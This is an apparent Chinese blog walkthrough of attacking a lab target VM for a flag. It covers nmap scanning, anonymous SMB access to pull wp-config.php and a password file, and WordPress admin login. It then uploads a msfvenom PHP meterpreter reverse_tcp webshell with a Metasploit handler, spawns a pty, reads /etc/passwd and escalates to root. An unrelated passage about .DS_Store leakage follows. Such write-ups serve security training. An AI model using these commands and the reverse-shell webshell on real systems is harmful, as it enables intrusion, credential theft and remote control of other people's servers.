SMB信息泄露

SMB信息泄露

1.确保攻击机和靶机处在同局域网/ 首先使用ifconfig命令查看本机IP地址

在这里插入图片描述

2.使用 nmap -sn -PE 192.168.56.0/24命令然后扫出靶机IP:192.168.56.103

在这里插入图片描述

3.使用nmap -sV 192.168.56.103 命令扫描靶机开放的服务端口

在这里插入图片描述

我们发现目标靶机有22,80,139,445,3306,6667 几个可能有用的端口开放,其中139和445进行的SMB服务

其中,使用计算机名访问时,SMB服务工作在NetBIOS协议之上,用的是TCP的139端口;使用IP地址访问时,用的是TCP的445端口。

针对SMB协议弱点分析
4.针对SMB协议,使用空口令,若口令尝试登陆,并查看敏感文件,下载查看:
smbclient -L IP           //查看SMB文件目录
smbclient '\\IP\$share'   //查看SMB文件
get 敏感文件               //下载文件
5.针对SMB协议远程溢出漏洞进行分析
searchsploit samba版本号 //搜索smb远程溢出漏洞
6.使用命令: smbclient -L 192.168.56.103尝试空口令登录

在这里插入图片描述

7.使用命令:smbclient '\\192.168.56.103\share$' 空命令进入查看目录

在这里插入图片描述

8. 注意本目录下的deets.txt和wordpress目录下的wp-config.php ,这里将其下载到kali上

在这里插入图片描述

在这里插入图片描述

9. 打开deets.txt文件,找到一个密码信息:12345 也许有用

在这里插入图片描述

10.打开 wp-config.php文件,里面存有数据库的一些配置信息,我们找到数据库的账号密码。

在这里插入图片描述

使用命令:searchsploit samba版本号 尝试搜索存在的漏洞 发现不存在

在这里插入图片描述


深度挖掘

针对HTTP协议弱点分析
1.浏览器查看网站
2.使用dirb或nikto探测
3.寻找突破点,目标登陆后台,上传webshell

dirb http://192.168.56.103     //查看靶机目录
1.发现可疑目录,尝试浏览器打开

在这里插入图片描述

2.使用刚才 wp-config.php文件中的用户 密码 发现成功登录

在这里插入图片描述

3.我们进入了后台之后,在kali制作webshell 使用如下命令
 msfvenom -p php/meterpreter/reverse_tcp lhost= 本机IP lport=4444 -f raw

将制作好的webshell保存在桌面,以便使用
在这里插入图片描述

4. 启动metasploit,然后启动监听:
msfconsole                           //启动metasploit
msf > use exploit/multi/handler      //调用模块
msf exploit(handler) > set payload php/meterpreter/reverse_tcp    
msf exploit(handler) > set lhost kali机IP
msf exploit(handler) > set lport 4444           //端口
msf exploit(handler) > run

在这里插入图片描述

5.kali正在监听4444端口,接下来,我们上传webshell。打开火狐浏览器,进入后台页面,将404模板跟换为改成的webshell

在这里插入图片描述

6.接下来进入kali 发现监听成功 然后进入shell,发现用户权限不够,于是想到提权

在这里插入图片描述

python -c "import pty;pty.spawn('/bin/bash')"       #美化shell改成终端模式
7.使用命令 cat /etc/passwd查看用户信息,发现home目录下存在togie用户
cat  /etc/passwd
landscape:x:103:109::/var/lib/landscape:/bin/false
togie:x:1000:1000:togie,,,:/home/togie:/bin/rbash
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:113:MySQL Server,,,:/nonexistent:/bin/false
8. 我们切换成该用户,使用deets.txt的密码12345,成功切换

在这里插入图片描述

9.尝试切换root用户,进入root目录

在这里插入图片描述

10.cd到root目录,看到有proof.txt文件,打开文件拿到flag

在这里插入图片描述

  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 9
    评论
.DS_Store是Mac系统用于存储目录自定义属性的隐藏文件,在浏览目录时会自动创建。.DS_Store文件中包含有关目录布局、文件图标和窗口位置等信息。在某些情况下,.DS_Store文件的信息可能会泄露。 .DS_Store信息泄露的风险在于可以通过这些文件了解到目录结构、已删除的文件、文件图标和窗口位置等个人或敏感信息。这可能导致信息泄露、隐私侵犯或安全漏洞。 为了避免.DS_Store信息泄露,可以采取以下措施: 1. 禁用.DS_Store文件的创建:可以通过在终端中运行命令“defaults write com.apple.desktopservices DSDontWriteNetworkStores -bool true”来禁用.DS_Store文件在网络共享目录中的创建。 2. 定期清除.DS_Store文件:可以使用命令“sudo find / -name ".DS_Store" -depth -exec rm {} \;”来搜索并清除系统中的.DS_Store文件。 3. 使用安全的文件共享方式:在进行文件共享时,避免使用.DS_Store文件,可以使用其他平台或协议,如SMB、FTP等。 4. 面向安全的文件管理实践:定期检查和管理系统中的文件,及时识别和删除可能包含敏感信息的.DS_Store文件。 综上所述,.DS_Store信息泄露是一种潜在的安全威胁,可以通过禁用.DS_Store文件的创建、定期清除文件、使用安全的文件共享方式和采取安全的文件管理实践来减少风险。保护.DS_Store文件的安全有助于保护个人隐私和信息安全。
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值